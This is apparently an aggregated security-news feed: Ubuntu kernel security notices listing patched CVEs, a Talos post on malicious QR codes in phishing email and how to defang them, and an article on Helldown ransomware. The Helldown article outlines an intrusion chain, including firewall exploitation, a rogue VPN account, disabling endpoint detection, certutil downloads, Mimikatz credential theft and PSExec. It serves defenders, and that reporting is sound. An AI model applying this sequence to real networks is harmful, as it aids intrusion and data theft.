Control Kernel framework;  - FireWire sound drivers;  - SoC audio core drivers;  - USB sound devices;(CVE-2023-52751, CVE-2024-43902, CVE-2024-46791, CVE-2024-45018,CVE-2024-44987, CVE-2024-46763, CVE-2024-46724, CVE-2024-26893,CVE-2024-42283, CVE-2024-46738, CVE-2024-46819, CVE-2024-44982,CVE-2023-52889, CVE-2024-45025, CVE-2023-52918, CVE-2024-46800,CVE-2024-46756, CVE-2024-46719, CVE-2024-39472, CVE-2024-42292,CVE-2024-45006, CVE-2024-46675, CVE-2024-44971, CVE-2024-46731,CVE-2024-42286, CVE-2024-44954, CVE-2024-42274, CVE-2024-46746,CVE-2024-42276, CVE-2024-43869, CVE-2024-43830, CVE-2024-42288,CVE-2024-41042, CVE-2024-42126, CVE-2024-43870, CVE-2024-46805,CVE-2024-41078, CVE-2024-44966, CVE-2024-44989, CVE-2024-46795,CVE-2024-44988, CVE-2024-38577, CVE-2024-43839, CVE-2024-43909,CVE-2024-46745, CVE-2024-42285, CVE-2024-43871, CVE-2024-41081,CVE-2024-42289, CVE-2024-44965, CVE-2024-42271, CVE-2024-42284,CVE-2024-45009, CVE-2024-41068, CVE-2024-44958, CVE-2024-46759,CVE-2024-42304, CVE-2024-43890, CVE-2024-41019, CVE-2024-43846,CVE-2024-41012, CVE-2024-44983, CVE-2024-41072, CVE-2024-46702,CVE-2024-26800, CVE-2024-42302, CVE-2023-52572, CVE-2024-46783,CVE-2024-43892, CVE-2024-45028, CVE-2024-44999, CVE-2024-46814,CVE-2024-41022, CVE-2024-42281, CVE-2024-46679, CVE-2024-42290,CVE-2024-44960, CVE-2024-41071, CVE-2024-41091, CVE-2024-44990,CVE-2024-46757, CVE-2024-38611, CVE-2024-47668, CVE-2024-45008,CVE-2024-46707, CVE-2024-44935, CVE-2024-42299, CVE-2024-46771,CVE-2024-42265, CVE-2024-43883, CVE-2024-46673, CVE-2024-46747,CVE-2024-43875, CVE-2024-44985, CVE-2024-42311, CVE-2024-46798,CVE-2024-43884, CVE-2024-46725, CVE-2024-42318, CVE-2024-43873,CVE-2024-42296, CVE-2024-43907, CVE-2024-43834, CVE-2024-46721,CVE-2024-47659, CVE-2024-45026, CVE-2024-47667, CVE-2024-44986,CVE-2024-41020, CVE-2024-43849, CVE-2024-46744, CVE-2024-44946,CVE-2024-43861, CVE-2024-42269, CVE-2024-46822, CVE-2024-46739,CVE-2024-44948, CVE-2024-46804, CVE-2024-41064, CVE-2024-44995,CVE-2024-26669, CVE-2024-46781, CVE-2024-46732, CVE-2024-42246,CVE-2024-46780, CVE-2024-46743, CVE-2024-44947, CVE-2024-47663,CVE-2024-46752, CVE-2024-43893, CVE-2024-45021, CVE-2024-43856,CVE-2024-46714, CVE-2024-41011, CVE-2024-41070, CVE-2024-46832,CVE-2024-46737, CVE-2024-43867, CVE-2024-42277, CVE-2024-44934,CVE-2024-46723, CVE-2024-43880, CVE-2024-43860, CVE-2024-42297,CVE-2024-45003, CVE-2024-46810, CVE-2024-43889, CVE-2024-42287,CVE-2024-43854, CVE-2024-42313, CVE-2024-42305, CVE-2024-41077,CVE-2024-38602, CVE-2024-46758, CVE-2024-46807, CVE-2024-43853,CVE-2024-45007, CVE-2024-41090, CVE-2024-42280, CVE-2024-46844,CVE-2024-45011, CVE-2024-47660, CVE-2024-47665, CVE-2024-46829,CVE-2024-44944, CVE-2024-41015, CVE-2024-42259, CVE-2024-43914,CVE-2024-43829, CVE-2022-48666, CVE-2024-43828, CVE-2024-46755,CVE-2024-43858, CVE-2024-46740, CVE-2024-46689, CVE-2024-42309,CVE-2024-42295, CVE-2024-41098, CVE-2023-52757, CVE-2024-46782,CVE-2024-46777, CVE-2024-46685, CVE-2024-44969, CVE-2024-47669,CVE-2024-43882, CVE-2024-42310, CVE-2024-43905, CVE-2024-44998,CVE-2024-42306, CVE-2024-40915, CVE-2024-46713, CVE-2024-41059,CVE-2024-41017, CVE-2024-43879, CVE-2024-46677, CVE-2024-42312,CVE-2024-43908, CVE-2024-46750, CVE-2024-46722, CVE-2024-42267,CVE-2024-46818, CVE-2024-26661, CVE-2024-43817, CVE-2024-42272,CVE-2024-41065, CVE-2024-46828, CVE-2024-46840, CVE-2024-46676,CVE-2024-43841, CVE-2024-46815, CVE-2024-26607, CVE-2023-52434,CVE-2024-46761, CVE-2024-42114, CVE-2024-41073, CVE-2024-43894,CVE-2024-43835, CVE-2024-46817, CVE-2024-41060, CVE-2024-36484,CVE-2024-42301, CVE-2024-44974, CVE-2024-43863, CVE-2024-41063)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1075-azure   5.15.0-1075.84  linux-image-azure-lts-22.04     5.15.0.1075.73After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7123-1  CVE-2022-48666, CVE-2023-52434, CVE-2023-52572, CVE-2023-52751,  CVE-2023-52757, CVE-2023-52889, CVE-2023-52918, CVE-2023-6610,  CVE-2024-25744, CVE-2024-26607, CVE-2024-26661, CVE-2024-26669,  CVE-2024-26800, CVE-2024-26893, CVE-2024-36484, CVE-2024-38577,  CVE-2024-38602, CVE-2024-38611, CVE-2024-39472, CVE-2024-40915,  CVE-2024-41011, CVE-2024-41012, CVE-2024-41015, CVE-2024-41017,  CVE-2024-41019, CVE-2024-41020, CVE-2024-41022, CVE-2024-41042,  CVE-2024-41059, CVE-2024-41060, CVE-2024-41063, CVE-2024-41064,  CVE-2024-41065, CVE-2024-41068, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41077, CVE-2024-41078,  CVE-2024-41081, CVE-2024-41090, CVE-2024-41091, CVE-2024-41098,  CVE-2024-42114, CVE-2024-42126, CVE-2024-42246, CVE-2024-42259,  CVE-2024-42265, CVE-2024-42267, CVE-2024-42269, CVE-2024-42271,  CVE-2024-42272, CVE-2024-42274, CVE-2024-42276, CVE-2024-42277,  CVE-2024-42280, CVE-2024-42281, CVE-2024-42283, CVE-2024-42284,  CVE-2024-42285, CVE-2024-42286, CVE-2024-42287, CVE-2024-42288,  CVE-2024-42289, CVE-2024-42290, CVE-2024-42292, CVE-2024-42295,  CVE-2024-42296, CVE-2024-42297, CVE-2024-42299, CVE-2024-42301,  CVE-2024-42302, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42312,  CVE-2024-42313, CVE-2024-42318, CVE-2024-43817, CVE-2024-43828,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43834, CVE-2024-43835,  CVE-2024-43839, CVE-2024-43841, CVE-2024-43846, CVE-2024-43849,  CVE-2024-43853, CVE-2024-43854, CVE-2024-43856, CVE-2024-43858,  CVE-2024-43860, CVE-2024-43861, CVE-2024-43863, CVE-2024-43867,  CVE-2024-43869, CVE-2024-43870, CVE-2024-43871, CVE-2024-43873,  CVE-2024-43875, CVE-2024-43879, CVE-2024-43880, CVE-2024-43882,  CVE-2024-43883, CVE-2024-43884, CVE-2024-43889, CVE-2024-43890,  CVE-2024-43892, CVE-2024-43893, CVE-2024-43894, CVE-2024-43902,  CVE-2024-43905, CVE-2024-43907, CVE-2024-43908, CVE-2024-43909,  CVE-2024-43914, CVE-2024-44934, CVE-2024-44935, CVE-2024-44944,  CVE-2024-44946, CVE-2024-44947, CVE-2024-44948, CVE-2024-44954,  CVE-2024-44958, CVE-2024-44960, CVE-2024-44965, CVE-2024-44966,  CVE-2024-44969, CVE-2024-44971, CVE-2024-44974, CVE-2024-44982,  CVE-2024-44983, CVE-2024-44985, CVE-2024-44986, CVE-2024-44987,  CVE-2024-44988, CVE-2024-44989, CVE-2024-44990, CVE-2024-44995,  CVE-2024-44998, CVE-2024-44999, CVE-2024-45003, CVE-2024-45006,  CVE-2024-45007, CVE-2024-45008, CVE-2024-45009, CVE-2024-45011,  CVE-2024-45018, CVE-2024-45021, CVE-2024-45025, CVE-2024-45026,  CVE-2024-45028, CVE-2024-46673, CVE-2024-46675, CVE-2024-46676,  CVE-2024-46677, CVE-2024-46679, CVE-2024-46685, CVE-2024-46689,  CVE-2024-46702, CVE-2024-46707, CVE-2024-46713, CVE-2024-46714,  CVE-2024-46719, CVE-2024-46721, CVE-2024-46722, CVE-2024-46723,  CVE-2024-46724, CVE-2024-46725, CVE-2024-46731, CVE-2024-46732,  CVE-2024-46737, CVE-2024-46738, CVE-2024-46739, CVE-2024-46740,  CVE-2024-46743, CVE-2024-46744, CVE-2024-46745, CVE-2024-46746,  CVE-2024-46747, CVE-2024-46750, CVE-2024-46752, CVE-2024-46755,  CVE-2024-46756, CVE-2024-46757, CVE-2024-46758, CVE-2024-46759,  CVE-2024-46761, CVE-2024-46763, CVE-2024-46771, CVE-2024-46777,  CVE-2024-46780, CVE-2024-46781, CVE-2024-46782, CVE-2024-46783,  CVE-2024-46791, CVE-2024-46795, CVE-2024-46798, CVE-2024-46800,  CVE-2024-46804, CVE-2024-46805, CVE-2024-46807, CVE-2024-46810,  CVE-2024-46814, CVE-2024-46815, CVE-2024-46817, CVE-2024-46818,  CVE-2024-46819, CVE-2024-46822, CVE-2024-46828, CVE-2024-46829,  CVE-2024-46832, CVE-2024-46840, CVE-2024-46844, CVE-2024-47659,  CVE-2024-47660, CVE-2024-47663, CVE-2024-47665, CVE-2024-47667,  CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1075.84

Ubuntu Security Notice USN-7123-1

Ubuntu Security Notice 7119-1 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7119-1November 19, 2024linux-iot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-iot: Linux kernel for IoT platformsDetails:Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linuxkernel contained an integer overflow vulnerability. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2022-36402)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - CPU frequency scaling framework;  - Device frequency scaling framework;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - InfiniBand drivers;  - Input Device core drivers;  - Input Device (Miscellaneous) drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - Modular ISDN driver;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - EEPROM drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Host Controller drivers;  - USB Serial drivers;  - USB Type-C Connector System Software Interface driver;  - USB over IP driver;  - Watchdog drivers;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - GFS2 file system;  - JFS file system;  - NILFS2 file system;  - Netfilter;  - BPF subsystem;  - Core kernel;  - DMA mapping infrastructure;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - RxRPC session sockets;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Integrity Measurement Architecture(IMA) framework;  - Simplified Mandatory Access Control Kernel framework;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-46750, CVE-2024-43853, CVE-2024-46722, CVE-2024-42311,CVE-2024-46679, CVE-2023-52918, CVE-2024-42309, CVE-2024-42160,CVE-2024-26668, CVE-2024-42271, CVE-2024-40929, CVE-2024-46747,CVE-2024-41064, CVE-2024-43839, CVE-2024-46757, CVE-2024-41059,CVE-2024-42301, CVE-2024-46737, CVE-2024-42297, CVE-2024-41015,CVE-2024-43854, CVE-2024-42289, CVE-2024-41017, CVE-2024-26787,CVE-2024-47667, CVE-2024-46675, CVE-2024-42246, CVE-2024-46723,CVE-2024-46817, CVE-2024-43841, CVE-2024-26800, CVE-2024-41098,CVE-2022-48863, CVE-2023-52531, CVE-2024-42265, CVE-2024-46828,CVE-2024-41020, CVE-2024-42305, CVE-2024-46755, CVE-2024-46744,CVE-2024-43871, CVE-2024-43884, CVE-2024-41042, CVE-2024-43914,CVE-2024-43856, CVE-2024-27397, CVE-2024-26607, CVE-2024-42228,CVE-2024-41091, CVE-2024-26677, CVE-2024-38611, CVE-2024-43867,CVE-2024-46829, CVE-2021-47188, CVE-2024-46756, CVE-2024-45025,CVE-2024-42313, CVE-2024-44947, CVE-2024-26669, CVE-2024-47668,CVE-2024-44987, CVE-2024-42295, CVE-2024-42281, CVE-2024-43880,CVE-2024-46777, CVE-2024-46780, CVE-2024-42285, CVE-2024-26891,CVE-2024-46714, CVE-2024-44999, CVE-2024-41068, CVE-2024-44944,CVE-2024-43882, CVE-2024-27051, CVE-2024-41072, CVE-2024-46783,CVE-2024-46781, CVE-2024-26885, CVE-2024-46844, CVE-2024-47669,CVE-2024-45008, CVE-2024-46758, CVE-2024-44954, CVE-2024-45021,CVE-2024-42304, CVE-2024-41081, CVE-2024-46798, CVE-2024-43890,CVE-2024-46840, CVE-2024-44960, CVE-2024-41012, CVE-2022-48791,CVE-2024-43908, CVE-2024-46721, CVE-2024-43829, CVE-2024-41073,CVE-2024-42306, CVE-2024-46745, CVE-2024-43858, CVE-2024-47663,CVE-2024-46782, CVE-2024-42244, CVE-2024-41090, CVE-2024-38602,CVE-2024-45003, CVE-2024-35848, CVE-2024-43883, CVE-2024-46677,CVE-2024-42280, CVE-2024-43846, CVE-2024-47659, CVE-2024-44965,CVE-2024-43893, CVE-2024-26960, CVE-2024-46676, CVE-2024-45016,CVE-2024-46689, CVE-2024-44998, CVE-2024-44995, CVE-2024-41022,CVE-2024-45026, CVE-2024-46739, CVE-2024-43830, CVE-2024-42286,CVE-2024-26640, CVE-2024-27012, CVE-2024-45006, CVE-2024-42276,CVE-2024-46818, CVE-2024-39494, CVE-2024-43860, CVE-2024-41070,CVE-2023-52614, CVE-2024-42283, CVE-2024-44969, CVE-2024-42229,CVE-2024-46740, CVE-2024-44948, CVE-2024-46822, CVE-2024-46738,CVE-2024-36484, CVE-2024-41065, CVE-2024-46685, CVE-2024-44935,CVE-2024-46759, CVE-2024-42292, CVE-2024-43879, CVE-2024-42287,CVE-2024-42288, CVE-2024-41063, CVE-2024-41011, CVE-2024-44946,CVE-2024-42290, CVE-2024-38570, CVE-2024-42310, CVE-2024-46743,CVE-2024-43861, CVE-2024-42131, CVE-2021-47212, CVE-2024-46719,CVE-2024-46815, CVE-2024-26641, CVE-2024-43894, CVE-2024-44988,CVE-2024-42259, CVE-2024-46771, CVE-2024-46673, CVE-2024-45028,CVE-2024-46761, CVE-2024-41071, CVE-2024-38630, CVE-2024-43835,CVE-2024-46800, CVE-2024-42284)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1044-iot      5.4.0-1044.45After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7119-1  CVE-2021-47188, CVE-2021-47212, CVE-2022-36402, CVE-2022-48791,  CVE-2022-48863, CVE-2023-52531, CVE-2023-52614, CVE-2023-52918,  CVE-2024-26607, CVE-2024-26640, CVE-2024-26641, CVE-2024-26668,  CVE-2024-26669, CVE-2024-26677, CVE-2024-26787, CVE-2024-26800,  CVE-2024-26885, CVE-2024-26891, CVE-2024-26960, CVE-2024-27012,  CVE-2024-27051, CVE-2024-27397, CVE-2024-35848, CVE-2024-36484,  CVE-2024-38570, CVE-2024-38602, CVE-2024-38611, CVE-2024-38630,  CVE-2024-39494, CVE-2024-40929, CVE-2024-41011, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41020, CVE-2024-41022,  CVE-2024-41042, CVE-2024-41059, CVE-2024-41063, CVE-2024-41064,  CVE-2024-41065, CVE-2024-41068, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41081, CVE-2024-41090,  CVE-2024-41091, CVE-2024-41098, CVE-2024-42131, CVE-2024-42160,  CVE-2024-42228, CVE-2024-42229, CVE-2024-42244, CVE-2024-42246,  CVE-2024-42259, CVE-2024-42265, CVE-2024-42271, CVE-2024-42276,  CVE-2024-42280, CVE-2024-42281, CVE-2024-42283, CVE-2024-42284,  CVE-2024-42285, CVE-2024-42286, CVE-2024-42287, CVE-2024-42288,  CVE-2024-42289, CVE-2024-42290, CVE-2024-42292, CVE-2024-42295,  CVE-2024-42297, CVE-2024-42301, CVE-2024-42304, CVE-2024-42305,  CVE-2024-42306, CVE-2024-42309, CVE-2024-42310, CVE-2024-42311,  CVE-2024-42313, CVE-2024-43829, CVE-2024-43830, CVE-2024-43835,  CVE-2024-43839, CVE-2024-43841, CVE-2024-43846, CVE-2024-43853,  CVE-2024-43854, CVE-2024-43856, CVE-2024-43858, CVE-2024-43860,  CVE-2024-43861, CVE-2024-43867, CVE-2024-43871, CVE-2024-43879,  CVE-2024-43880, CVE-2024-43882, CVE-2024-43883, CVE-2024-43884,  CVE-2024-43890, CVE-2024-43893, CVE-2024-43894, CVE-2024-43908,  CVE-2024-43914, CVE-2024-44935, CVE-2024-44944, CVE-2024-44946,  CVE-2024-44947, CVE-2024-44948, CVE-2024-44954, CVE-2024-44960,  CVE-2024-44965, CVE-2024-44969, CVE-2024-44987, CVE-2024-44988,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45008, CVE-2024-45016, CVE-2024-45021,  CVE-2024-45025, CVE-2024-45026, CVE-2024-45028, CVE-2024-46673,  CVE-2024-46675, CVE-2024-46676, CVE-2024-46677, CVE-2024-46679,  CVE-2024-46685, CVE-2024-46689, CVE-2024-46714, CVE-2024-46719,  CVE-2024-46721, CVE-2024-46722, CVE-2024-46723, CVE-2024-46737,  CVE-2024-46738, CVE-2024-46739, CVE-2024-46740, CVE-2024-46743,  CVE-2024-46744, CVE-2024-46745, CVE-2024-46747, CVE-2024-46750,  CVE-2024-46755, CVE-2024-46756, CVE-2024-46757, CVE-2024-46758,  CVE-2024-46759, CVE-2024-46761, CVE-2024-46771, CVE-2024-46777,  CVE-2024-46780, CVE-2024-46781, CVE-2024-46782, CVE-2024-46783,  CVE-2024-46798, CVE-2024-46800, CVE-2024-46815, CVE-2024-46817,  CVE-2024-46818, CVE-2024-46822, CVE-2024-46828, CVE-2024-46829,  CVE-2024-46840, CVE-2024-46844, CVE-2024-47659, CVE-2024-47663,  CVE-2024-47667, CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1044.45

Ubuntu Security Notice USN-7119-1

QR codes are disproportionately effective at bypassing most anti-spam filters. Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption.

Wednesday, November 20, 2024 06:00

*   QR codes are disproportionately effective at bypassing most anti-spam filters, as most filters are not designed to recognize that a QR code is present in an image and decode the QR code. According to Cisco Talos’ data, roughly 60% of all email containing a QR code is spam.  
*   Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption. Users could obscure the data modules, the black and white squares within the QR code that represent the encoded data. Alternatively, users could remove one or more of the position detection patterns — large square boxes located in corners of the QR code used to initially identify the code's orientation and position. 
*   Further complicating detection, both by users and anti-spam filters, Talos found QR code images that are “QR code art.” These images blend the data points of a QR code seamlessly into an artistic image so the result does not appear to be a QR code at all. 

Prior to 1994, most code scanning technology utilized one-dimensional barcodes. These one-dimensional barcodes consist of a series of parallel black lines of varying width and spacing. We are all familiar with these codes, like the type you might find on the back of a cereal box from the grocery store. However, as the use of barcodes increased, their limitations became problematic, especially considering that a one-dimensional barcode can only hold up to 80 alphanumeric characters of information. To eliminate this limitation, a company named Denso Wave created the very first “Quick Response“ codes (QR codes). 

QR codes are a two-dimensional matrix bar code that can encode just over 7,000 numeric characters, or up to approximately 4,300 alphanumeric characters. While they can represent almost any data, most frequently we encounter QR codes that are used to encode URLs. 

**Quantifying the QR code problem **

Talos extracts QR codes from images inside email messages and attached PDF files for analysis. QR codes in email messages make up between .01% and .2% of all email worldwide. This equates to roughly one out of every 500 email messages. However, because QR codes are disproportionately effective at bypassing anti-spam filters, a significant number find their way into users’ email inboxes, skewing users’ perception of the overall problem.  

Also, of course, not all email messages with a QR code inside are spam or malicious. Many email users send QR codes as part of their email signature, or you may also find legitimate emails containing QR codes used as signups for events, and so on. However, according to Talos’ data, **roughly 60% of all email containing a QR code is spam**.   

Truly malicious QR codes can be found in a much smaller number of messages. These emails contain links to phishing pages, etc. The most common malicious QR codes tend to be multifactor authentication (MFA) requests used for phishing user credentials. 

An example MFA phishing email utilizing a QR code.

One of the problems that defenders may encounter when dealing with users’ scanning of QR codes received via email, assuming the user’s device is not connected to the corporate wi-fi, is that subsequent traffic between the victim and the attacker will traverse the cellular network, largely outside the purview of corporate security devices. This can complicate defense, because few/no alerts from security devices will notify security teams that this has occurred. 

**Why are malicious QR codes hard to detect? **

Because QR codes are displayed in images, it can be difficult for anti-spam systems to identify problematic codes. Identifying and filtering these messages requires the anti-spam system to recognize that a QR code is present in an image, decode the QR code, then analyze the link (or other data) present in the decoded data. As spammers are always looking for innovative ways to bypass spam filters, using QR codes has been a valuable technique for spammers to accomplish this. 

As anti-spam systems improve their capability to detect malicious QR codes in images, enterprising attackers have instead decided to craft their QR codes using Unicode characters.

__An email containing a QR code constructed from Unicode characters (defanged).__

The graphical parts of the image are contained within a PDF file. The PDF metadata indicates it was created from HTML using the tool wkhtmltopdf. Converting the PDF back into HTML shows the Unicode that is being used to construct the QR code. 

__HTML used to construct a malicious QR Code from Unicode characters.__

**Defanging QR codes **

When sharing malicious URLs, it is common to change the protocol from “http” to “hxxp”, and/or to add brackets (“\[\]”) around one of the dots in the URL. This makes it so browsers and other applications do not render the link as an active URL, ensuring that users do not inadvertently click on the malicious URL. This is a process known as “defanging.” Unfortunately, while defanging URLs is commonplace, many people do not defang malicious QR codes. For example, below is a news article from BBC about criminals who put QR code stickers on parking meters in an attempt to harvest payment credentials from unsuspecting victims. 

__A news article from BBC containing a working QR code (this has been defanged by Talos).__

The problem is that these QR codes can still be scanned, taking visitors to whatever malicious link that the QR code encoded. **To make malicious QR codes safe for consumption, they should be defanged.** 

There are a couple of different ways to do this. One way is to obscure the data modules, the black and white squares within the QR code that represent the encoded data. This is where the data that the QR code represents is located. However, based on Talos’ own research, a far easier way to defang a QR code is to remove one or more of the position detection patterns (a.k.a. finder patterns). These are the large square boxes located in three of the four corners of the QR code, which are used by the QR code scanner to initially identify the code's orientation and position. Removing the position detection patterns renders a QR code unscannable by virtually all scanners. Additional details on how this is achieved, will be covered later in the blog. 

A normal QR code on the left vs. a defanged QR code on the right.

**Be careful what you scan! **

For years, security professionals have encouraged users **not** to click on unfamiliar or suspicious URLs. These URLs could potentially lead to phishing pages, malware or other harmful sites. However, many users do not exercise the same care when scanning an unknown QR code as they do when clicking on a suspicious link. To be clear, scanning an unknown/suspicious QR code is equivalent to clicking on a suspicious URL. 

To complicate the situation even more, there are QR code images that are “QR code art.” These images blend the data points of a QR code seamlessly into an artistic image so the result does not appear to be a QR code at all. The potential danger with QR code art images is that a user could conceivably be tricked into scanning a QR code art image with their camera, and then inadvertently navigate to the linked content without realizing it.

**How to protect yourself from malicious QR codes **

QR codes have become ubiquitous, appearing in email, on restaurant menus, at public events, on retail packaging, in museums, and even public parks and trails. The perfect defense is to avoid scanning any QR codes; however, it can be difficult to avoid scanning these entirely, so users must exercise caution. Scanning a QR code is essentially the same as clicking on an unknown hyperlink, but without the ability to see the full URL beforehand. 

There are several QR code decoders freely available online. Typically, if you can save a screenshot of the QR code, you can upload this image to one of these decoders, and the QR code decoder will tell you what data was encoded inside the QR code. This will allow you to more closely inspect the link. You can also choose to navigate to that URL using an application like Cisco Secure Malware Analytics (Threat Grid). This will allow you to view the content behind the URL from a safe place, without jeopardizing the security of your desktop or mobile device. As always, never enter your username and password into an unknown site. It is better to navigate directly to anywhere you wish to login, rather than clicking on a URL presented to you from an unknown third party.

Malicious QR Codes: How big of a problem is it, really?

Since surfacing in August, the likely LockBit variant has claimed more than two dozen victims and appears poised to strike many more.

Source: Nicolas Bentancor via Shutterstock

The purveyor of a rapidly emerging ransomware family being tracked as "Helldown" introduced a new Linux variant, targeting organizations across multiple sectors using VMware ESXi servers.

Several of the victims had Zyxel firewalls deployed as IPSec VPN access points at the time of breach, suggesting the attackers exploited a vulnerability or vulnerabilities in the technology to gain initial access, security researchers at Sekoia reported this week. Since surfacing in August, the group behind Helldown has quickly notched 31 victims, many of them US-based.

**Undocumented Zyxel Vulnerabilities?**

Available telemetry suggests the Zyxel flaw that the attackers are exploiting is undocumented, Seokia said. But Zyxel has issued fixes for multiple vulnerabilities in its firewalls after Helldown actors breached the company's network, also in August, and then leaked some 250GB worth of data. As of mid-November, no exploit code for any of these vulnerabilities appears to be publicly available, Sekoia said, while leaving open the possibility that the Helldown attackers could be exploiting any one of the vulnerabilities.

"Helldown is a notably active new intrusion set, as shown by its large number of victims," Sekoia researcher Jeremy Scion wrote this week. "Available data indicates that the group mainly targets Zyxel firewalls by exploiting undocumented vulnerabilities." Though the ransomware itself is standard fare, what makes the group dangerous is its apparent access to and effective use of undocumented vulnerability code, Scion noted.

Zyxel firewalls, like many other network and edge technologies, are a popular attacker target. Threat actors have been quick to exploit flaws in the company's products in various campaigns in the past, including one dubbed IZ1H9 that targeted Internet-of-Things (IoT) networks; another involving a Mirai variant; and another that hit Danish critical infrastructure.  

**A Troubling Shift**

Patrick Tiquet, vice president security and architecture at Keeper Security, viewed Helldown as a troubling shift in ransomware actor tactics. "While ransomware targeting Linux isn't unprecedented, Helldown's focus on VMware systems shows its operators are evolving to disrupt the virtualized infrastructures many businesses rely on," he said via email. "The message to security teams is clear: patch known vulnerabilities, monitor for unusual activity, and treat virtualized environments with the same vigilance as traditional ones."

Multiple security vendors have reported attacks involving Helldown since early August. Most of its victims have been small and medium sized businesses across different sectors, including transportation, manufacturing, healthcare, telecommunications, and IT services. Halycon, one of the first to spot Helldown, described the group as "highly aggressive" and capable of causing substantial disruption and financial losses to victims. According to Halycon, Helldown actors have a penchant for stealing large volumes of data from victims and threatening to leak the data unless it receives a ransom.

In a report earlier this month, Truesec perceived the threat actor as being more sophisticated in its initial compromise techniques compared to better known ransomware operators, such as the one behind Akira. In the attacks that Truesec analyzed, Helldown threat actors leveraged legitimate tools and other living-off-the-land techniques to execute their mission on a compromised network.

**Dangerous Adversary**

"Recent incidents showed that the group will thoroughly remove tools utilized during a compromise, as well as override the free disk space on the hard drive of different machines, in attempts to hinder the recovery process and reduce the effectiveness of file carving," Trusec observed. Helldown actors likely accessed victim environments directly from their Internet-facing Zyxel firewall, the security vendor posited. Once on a victim network, the threat actor used either TeamViewer or the default Windows RDP client for lateral movement, PowerShell for remote code execution, and Mimikatz to search for and retrieve credentials.

According to Sekoia, reports from multiple Helldown victims indicate that the attacker compromised Zyxel firewalls running firmware version 5.38. "Specifically, a file named zzz1.conf was uploaded, and a user account called OKSDW82A was created" on compromised systems, Scion noted. The attacker then used the temporary account to create an SSL VPN tunnel for accessing and pivoting further into the victim network.  

The attack chain included attempts by the threat actor to disable endpoint detection mechanisms using a tool called HRSword; leverage the domain controller's LDAP credentials to burrow deeper into the network; use certutil to download Advanced Port Scanner; use RDP or TeamViewer for remote access and lateral movement; and use PSExec for remote code execution.

Scion said Sekoia's analysis of the files that Helldown actors have published on their data leak site showed many of them to be unusually large and averaging around 70GB. The biggest file, in fact, weighed in at a hefty 431GB, which is noteworthy because ransomware actors typically tend to be more selective in the files they steal and use for extortion. The contents of the stolen files also tended to be more variable and random than usual for a ransomware operation. "The large volume and variety of data suggest that the attacker does not selectively choose which documents to steal," Scion said. "Instead, they appear to target data sources that store administrative files, such as PDFs and document scans, which typically contain sensitive information (personal, financial, etc.), thereby intensifying the pressure on victims."

Helldown's behavior itself is similar to that of Darkrace, a LockBit variant that first surfaced in August 2023 and may have been rebranded as Donex in February of this year. Though the links between the ransomware strains are not conclusive, there is a possibility that Helldown is a rebrand of Donex, Sekoia said.

**About the Author**

